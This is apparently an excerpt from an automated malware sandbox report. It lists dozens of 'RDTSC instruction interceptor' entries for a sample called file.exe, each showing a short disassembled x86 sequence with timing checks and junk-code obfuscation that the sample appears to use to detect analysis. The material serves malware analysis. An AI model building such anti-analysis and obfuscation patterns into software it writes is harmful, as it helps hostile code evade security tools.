Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B06D8 second address: 5B06DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1E42 second address: 5D1E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1E46 second address: 5D1E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D18D1 second address: 5D18E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jbe 00007F0085357C16h 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B16AF second address: 5B1742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b mov dword ptr [ebp+124705BDh], ebx 0x00000011 popad 0x00000012 push dword ptr fs:[00000000h] 0x00000019 add ebx, 63223098h 0x0000001f jmp 00007F0084E2F653h 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F0084E2F648h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D346Ah], ebx 0x0000004b jmp 00007F0084E2F650h 0x00000050 mov eax, dword ptr [ebp+122D0ABDh] 0x00000056 mov di, ax 0x00000059 push FFFFFFFFh 0x0000005b and di, 7B37h 0x00000060 mov dword ptr [ebp+1244E987h], ebx 0x00000066 nop 0x00000067 jnp 00007F0084E2F658h 0x0000006d push eax 0x0000006e push edx 0x0000006f js 00007F0084E2F646h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B28C5 second address: 5B28C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5813 second address: 5B5819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5819 second address: 5B581D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B581D second address: 5B582B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B582B second address: 5B582F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D28BB second address: 5D28C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D28C1 second address: 5D28C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2C03 second address: 5D2C21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F653h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2C21 second address: 5D2C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F0085357C16h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D61E2 second address: 5D6210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0084E2F657h 0x00000009 jmp 00007F0084E2F653h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D6210 second address: 5D6214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBFCD second address: 5DBFFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F656h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007F0084E2F646h 0x00000010 jmp 00007F0084E2F64Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5605D1 second address: 5605D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DADCC second address: 5DADD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DADD0 second address: 5DADD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DADD8 second address: 5DADE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jg 00007F0084E2F646h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DADE7 second address: 5DAE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F0085357C35h 0x0000000f jmp 00007F0085357C29h 0x00000014 jp 00007F0085357C16h 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DAE1B second address: 5DAE22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59BE6F second address: 59BEED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F0085357C18h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1F26h], edx 0x0000002c lea eax, dword ptr [ebp+12480B89h] 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F0085357C18h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c jmp 00007F0085357C25h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59BEED second address: 59BEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59BEF1 second address: 59BEF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59BF90 second address: 59C043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp], ebx 0x0000000b add edx, dword ptr [ebp+122D2CE8h] 0x00000011 jmp 00007F0084E2F657h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov edi, dword ptr [ebp+122D2F58h] 0x00000023 call 00007F0084E2F64Dh 0x00000028 or dx, CFD2h 0x0000002d pop edx 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 jmp 00007F0084E2F64Eh 0x0000003a mov dword ptr [ebp+12480BE1h], esp 0x00000040 mov dword ptr [ebp+122D300Ah], edi 0x00000046 cmp dword ptr [ebp+122D2F90h], 00000000h 0x0000004d jne 00007F0084E2F6D1h 0x00000053 or edi, 3B7A0486h 0x00000059 mov byte ptr [ebp+122D1C6Bh], 00000047h 0x00000060 cmc 0x00000061 mov eax, D49AA7D2h 0x00000066 push 00000000h 0x00000068 push eax 0x00000069 call 00007F0084E2F648h 0x0000006e pop eax 0x0000006f mov dword ptr [esp+04h], eax 0x00000073 add dword ptr [esp+04h], 0000001Bh 0x0000007b inc eax 0x0000007c push eax 0x0000007d ret 0x0000007e pop eax 0x0000007f ret 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 push ecx 0x00000084 push eax 0x00000085 pop eax 0x00000086 pop ecx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C043 second address: 59C049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C2CA second address: 59C2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C3DA second address: 3EECA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dx, DB02h 0x0000000c push dword ptr [ebp+122D0F9Dh] 0x00000012 call dword ptr [ebp+122D3B17h] 0x00000018 pushad 0x00000019 sub dword ptr [ebp+122D308Dh], edi 0x0000001f jmp 00007F0085357C28h 0x00000024 xor eax, eax 0x00000026 xor dword ptr [ebp+122D1C71h], ebx 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 pushad 0x00000031 sub dword ptr [ebp+122D1C71h], ecx 0x00000037 popad 0x00000038 mov dword ptr [ebp+122D2EB8h], eax 0x0000003e clc 0x0000003f mov esi, 0000003Ch 0x00000044 xor dword ptr [ebp+122D3071h], esi 0x0000004a add esi, dword ptr [esp+24h] 0x0000004e stc 0x0000004f lodsw 0x00000051 mov dword ptr [ebp+122D1F26h], edi 0x00000057 add eax, dword ptr [esp+24h] 0x0000005b jbe 00007F0085357C1Ch 0x00000061 add dword ptr [ebp+122D1F26h], ecx 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D2372h], ebx 0x00000071 push eax 0x00000072 pushad 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C459 second address: 59C4A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0084E2F646h 0x0000000a popad 0x0000000b pop edx 0x0000000c add dword ptr [esp], 48902D91h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F0084E2F648h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d pushad 0x0000002e mov ecx, 74681E58h 0x00000033 mov ebx, edx 0x00000035 popad 0x00000036 push F4B0CB71h 0x0000003b push eax 0x0000003c push edx 0x0000003d push ecx 0x0000003e js 00007F0084E2F646h 0x00000044 pop ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C62B second address: 59C647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C647 second address: 59C64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C64C second address: 59C6B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0085357C18h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D1E11h], edx 0x0000002a nop 0x0000002b jmp 00007F0085357C28h 0x00000030 push eax 0x00000031 pushad 0x00000032 jmp 00007F0085357C1Dh 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C6B2 second address: 59C6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C782 second address: 59C791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0085357C1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C791 second address: 59C7B5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0084E2F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0084E2F655h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C7B5 second address: 59C7E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0085357C20h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 jmp 00007F0085357C1Eh 0x00000017 pop eax 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59C7E7 second address: 59C806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0084E2F651h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D042 second address: 59D046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D169 second address: 59D16F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59D16F second address: 585269 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0085357C18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1F26h], edi 0x00000011 call dword ptr [ebp+122D24D6h] 0x00000017 jng 00007F0085357C36h 0x0000001d jnc 00007F0085357C24h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB0E7 second address: 5DB102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F0084E2F646h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pop esi 0x00000012 js 00007F0084E2F654h 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB40C second address: 5DB410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB6F0 second address: 5DB6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB9D6 second address: 5DB9E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0085357C16h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB51 second address: 5DBB68 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0084E2F646h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F0084E2F646h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB68 second address: 5DBB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB6E second address: 5DBB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB79 second address: 5DBB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB7D second address: 5DBB83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E044A second address: 5E044E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E05BF second address: 5E05D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 jg 00007F0084E2F664h 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F0084E2F646h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E05D5 second address: 5E05D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E05D9 second address: 5E05DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E072B second address: 5E0766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0085357C22h 0x0000000c pushad 0x0000000d ja 00007F0085357C16h 0x00000013 jmp 00007F0085357C1Fh 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jl 00007F0085357C16h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0766 second address: 5E076A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E076A second address: 5E0770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFF5E second address: 5DFF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFF62 second address: 5DFF9A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jmp 00007F0085357C21h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0085357C28h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E3E12 second address: 5E3E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E3E19 second address: 5E3E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E3E24 second address: 5E3E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E9513 second address: 5E9517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F0156 second address: 5F0170 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F656h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CBB6 second address: 59CBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 js 00007F0085357C28h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CBC7 second address: 59CBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CBCB second address: 59CC26 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0085357C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b or dword ptr [ebp+124515A8h], eax 0x00000011 adc dx, 2B5Ah 0x00000016 push 00000004h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F0085357C18h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 sbb ch, FFFFFFE6h 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F0085357C28h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CC26 second address: 59CC4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F658h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b ja 00007F0084E2F64Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EFE9E second address: 5EFEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F2881 second address: 5F2887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F2887 second address: 5F28A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0085357C24h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7150 second address: 5F7155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7155 second address: 5F7172 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0085357C1Eh 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b js 00007F0085357C16h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7472 second address: 5F747F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0084E2F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F747F second address: 5F74AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0085357C16h 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F0085357C31h 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F0085357C29h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F77F2 second address: 5F77F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F793B second address: 5F7941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7941 second address: 5F7951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7951 second address: 5F796F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C28h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7B0C second address: 5F7B16 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
